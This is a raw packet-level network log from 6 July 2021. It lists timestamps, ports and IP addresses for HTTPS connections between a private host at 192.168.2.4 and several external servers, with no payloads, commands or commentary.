Jul 6, 2021 14:30:38.613194942 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613213062 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613231897 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613250971 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613270044 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613290071 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613306046 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.613308907 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613317966 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.613321066 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613338947 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613353014 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613360882 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613368034 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613370895 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613382101 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613404989 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613415956 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613420963 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613425970 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613441944 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613447905 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613467932 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613486052 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.613503933 CEST	443	49850	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.613512993 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613519907 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.613527060 CEST	443	49850	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.613544941 CEST	443	49850	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.613558054 CEST	443	49850	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.613642931 CEST	49850	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.613689899 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.623167038 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.625401020 CEST	49850	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.626890898 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.627188921 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.628329039 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.628463030 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.628578901 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.630757093 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.631474018 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.642524958 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.667227030 CEST	443	49849	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.667368889 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.669502020 CEST	443	49850	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.671221018 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.671348095 CEST	49850	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.673791885 CEST	443	49849	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:38.673907042 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:38.677413940 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.679261923 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.679297924 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.679313898 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.679342985 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.679378033 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.682365894 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.682797909 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.682991028 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.687186003 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.688641071 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.688668013 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.688683033 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.688718081 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.688735962 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.692626953 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.692677975 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.694274902 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694307089 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694324970 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694335938 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694351912 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694366932 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694377899 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.694384098 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694391012 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.694403887 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694422007 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694437027 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694451094 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.694453001 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694457054 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.694468021 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694479942 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694494963 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694508076 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694525957 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.694525957 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694530010 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.694541931 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.694578886 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.694583893 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.697001934 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.728265047 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.729639053 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.729650974 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.729665041 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.729675055 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.729686022 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.729697943 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.729710102 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.749794006 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.749849081 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.749855995 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.749922991 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.749954939 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.749964952 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.749969959 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.749980927 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.750171900 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.750761986 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:38.763039112 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763072968 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763148069 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763184071 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763207912 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763216972 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763223886 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763252020 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763269901 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763278008 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763284922 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763322115 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763355017 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763362885 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763365984 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763386011 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763411045 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763423920 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763427019 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763436079 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763467073 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763468027 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763473034 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763489962 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763521910 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763554096 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763566017 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763569117 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763577938 CEST	443	49839	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:38.763612032 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.763616085 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:38.795547962 CEST	443	49851	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:38.796298981 CEST	443	49852	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:39.915807962 CEST	49836	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:39.917047024 CEST	49837	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:39.917165995 CEST	49838	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:39.917311907 CEST	49839	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:39.917349100 CEST	49845	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:39.917416096 CEST	49846	443	192.168.2.4	142.250.180.206
Jul 6, 2021 14:30:39.917535067 CEST	49850	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:39.917567968 CEST	49849	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:39.917589903 CEST	49852	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:39.917629004 CEST	49851	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:42.028076887 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.047972918 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.070333958 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.070445061 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.078299999 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.090234995 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.090399027 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.091077089 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.121480942 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.122488022 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.122508049 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.122517109 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.122575045 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.122601986 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.133369923 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.134046078 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.134066105 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.134078979 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.134202003 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.134242058 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.160638094 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.161173105 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.171367884 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.171757936 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.179600954 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.203218937 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.203237057 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.204128027 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.204235077 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.204874992 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.204889059 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.204901934 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.204952002 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.205029011 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.209952116 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.211357117 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.214740038 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.214756012 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.215027094 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.216187000 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.216201067 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.216209888 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.216444969 CEST	49859	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.221642971 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.222613096 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.222678900 CEST	49858	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:30:42.252063990 CEST	443	49859	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.253973007 CEST	443	49858	82.165.229.87	192.168.2.4
Jul 6, 2021 14:30:42.329991102 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.330753088 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.376368046 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.376424074 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.376562119 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.376605034 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.505333900 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.505914927 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.550147057 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.550173998 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.550470114 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.550493002 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.550509930 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.550549984 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.550579071 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.550945044 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.550971985 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.550991058 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.551084042 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.556946039 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.557451010 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.557667971 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.561538935 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.561953068 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.603106976 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.603378057 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.603395939 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.603405952 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.603457928 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.603480101 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.603528023 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.603657961 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.605350971 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.607311964 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.607728004 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.608055115 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.608119965 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.608134031 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.608151913 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.608181000 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.608185053 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.608762026 CEST	49861	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.628537893 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628587008 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628606081 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628618002 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628628969 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628638029 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628645897 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.628653049 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628673077 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.628673077 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628685951 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628700018 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.628705978 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628726959 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628746986 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628762960 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628772974 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.628777981 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628792048 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.628798962 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628809929 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628828049 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.628833055 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.628870964 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:42.650080919 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:42.653141975 CEST	443	49861	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.745387077 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.789735079 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814150095 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814193010 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814218044 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814240932 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814249039 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814263105 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814281940 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814286947 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814316034 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814331055 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814337015 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814362049 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814363956 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814384937 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814409971 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814410925 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814433098 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814454079 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814460993 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814481974 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814487934 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814513922 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814517975 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814532995 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814543962 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814553976 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.814583063 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.814621925 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.842103004 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.886574984 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:43.982958078 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:43.983319044 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:43.984496117 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.001916885 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.002033949 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.027401924 CEST	443	49862	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.027537107 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.027563095 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.029079914 CEST	443	49863	82.165.229.16	192.168.2.4
Jul 6, 2021 14:30:44.029162884 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.030014038 CEST	49863	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.032059908 CEST	49862	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:30:44.044620991 CEST	443	49865	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.044658899 CEST	443	49864	82.165.229.54	192.168.2.4
Jul 6, 2021 14:30:44.044771910 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.044995070 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.045895100 CEST	49864	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.047955990 CEST	49865	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:30:44.048947096 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049001932 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049032927 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049046040 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049088001 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049093008 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049125910 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049153090 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049169064 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049184084 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049220085 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049252987 CEST	49860	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:30:44.049256086 CEST	443	49860	82.165.229.59	192.168.2.4
Jul 6, 2021 14:30:44.049297094 CEST	443	49860	82.165.229.59	192.168.2.4
